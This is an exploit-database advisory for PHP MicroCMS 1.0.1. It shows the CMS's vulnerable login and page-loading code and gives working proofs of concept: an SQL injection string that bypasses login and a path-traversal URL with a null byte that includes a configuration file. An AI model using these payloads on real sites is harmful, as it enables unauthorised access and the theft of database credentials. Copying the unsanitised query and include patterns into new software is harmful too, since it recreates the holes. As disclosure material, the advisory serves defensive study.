PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities

2010-09-16T00:00:00
ID 1337DAY-ID-14083
Type zdt
Reporter Abysssec
Modified 2010-09-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==================================================
PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
==================================================

Title  : PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
Affected Version : PHP MicroCMS <= 1.0.1
Vendor  Site   : www.apphp.com/php-microcms/index.php
  
Discovery : abysssec.com
   
Description :
  
This CMS have many critical vulnerability that we refere to some of those here:
  
  
Vulnerabilites :
 
1. Authentication bypass with SQL Injection in login page:
 
user_name and password parameters recived from the login form are passed to do_login function:
login.php
line 12-17:
    function Login() {
        $this->wrong_login = false;
        if (!$this->is_logged_in() && $_POST['submit'] == "Login" && !empty($_POST['user_name']) && !empty($_POST['password'])) $this->do_login($_POST['user_name'], $_POST['password']);
        else if ($_POST['submit_logout'] == "Logout") $this->do_logout();
        $this->accounts = new Profiles($GLOBALS['user_session']->get_session_variable("session_account_id"));
    }
 
in do_login function these parameters are passed to get_account_information function:
login.php line 19-29:
function do_login($user_name, $password, $do_redirect = true) {
        if ($account_information = $this->get_account_information($user_name, $password)) {
                $this->set_session_variables($account_information);
                if ($do_redirect) {
                    header("Location: index.php\r\n\r\n");
                    exit;
                }
        }else{
            $this->wrong_login = true;
        }
    }
 
 
then these parameters without any validation are applied in SQL query directly:
login.php line 48-55:
    function get_account_information($user_name, $password) {
        $sql = "SELECT ".DB_PREFIX."accounts.*, user_name AS account_name
                               FROM ".DB_PREFIX."accounts
                               WHERE
                                    user_name = '" . $user_name . "' AND            // vulnerability here
                                    password = AES_ENCRYPT('" . $password . "', '" . DB_ENCRYPT_KEY . "')"; // vulnerability here
        return database_query($sql, DATA_ONLY, FIRST_ROW_ONLY);
    }
 
POC:
in login page enter:
username: a' or '1'='1
password: a' or '1'='1
----------------------------------------------------------------------------------------------------
2. Local File Inclusion:
 
index.php file line 21:
    $page = !empty($_GET['page']) ? $_GET['page'] : "home";
 
index.php file line 104,105:
                    if (($page != "") && file_exists("page/" . $page . ".php")) {
                        require("page/" . $page . ".php"); 
poc:
http://localhost/microcms/index.php?page=../include/base.inc.php%00



#  0day.today [2018-03-14]  #